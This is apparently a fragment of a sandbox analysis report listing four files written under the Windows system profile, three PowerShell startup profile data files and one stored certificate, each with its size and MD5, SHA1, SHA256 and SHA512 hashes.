C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD5b899207441c0301bb017e3141d12fbd0
SHA14f7811f37267e498fe5cf0b492aaebb906ac5e2a
SHA25673ea7a0773a42b5d698bcaded17c028c28a8a4c9be070aefc870665668a55200
SHA5121ee8f058888566de059adf051dfda5d9468fa5b90219aff996e151759184cfefd0f91261fdf70aa8deb9359555e163da35402f058daf35093a6867256090abd2
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD55ce3e53600f2783e196444545a1f216d
SHA12e28ffeec72856576448b85c04a3925d0872c87e
SHA256d8cd932ef3436f38c6d63c4670b6d3d34b7ffff76ba5d7eeeed4c84ce77025b3
SHA5129f5ff276586347276fe1b5e03f4e689426ffdf554a56b9c9d8190160d45580cba2c164eb9a09fbc42fd2844fe17780b8d03b64774e45ad0c5d0e198e934dea4e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD50f83a5c85488489ec8bbd93f8908c36a
SHA144f425b2beb19614a8e78fd77e779d152ac0fba1
SHA256faa19aa4ce6bfa71c886d9fc794edd74af47381a6a2774c4972274998310a3f9
SHA5127068947bc6c026cb5e3a4d4eb2e0564503ff49b339cb0af4a4595d924670758589cce565011c64f5ba9fc83bd8d863e7ac9020a7fb39c6586f44fc104c1fdd35
-
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\DA31673C72A0B94D6328F67867407D67EF4ADE6B
Filesize1KB
MD5b54a2a77a305eaae92bca813c3748c78
SHA1a8ad1620bd499c779f688118112a53985dbea627
SHA25622fd8a45637bf477f7f8854fd679d30c04fd117159164d617955ed8ae869b58b
SHA512ccd37c84ebc1b375277f69e3315224a0ecbc9d7e6812878b286b6afa91d1bfa90d60070c04e08311064f10f5ce5be67e5705c621ee6916a45d4c860bd7ba3b7b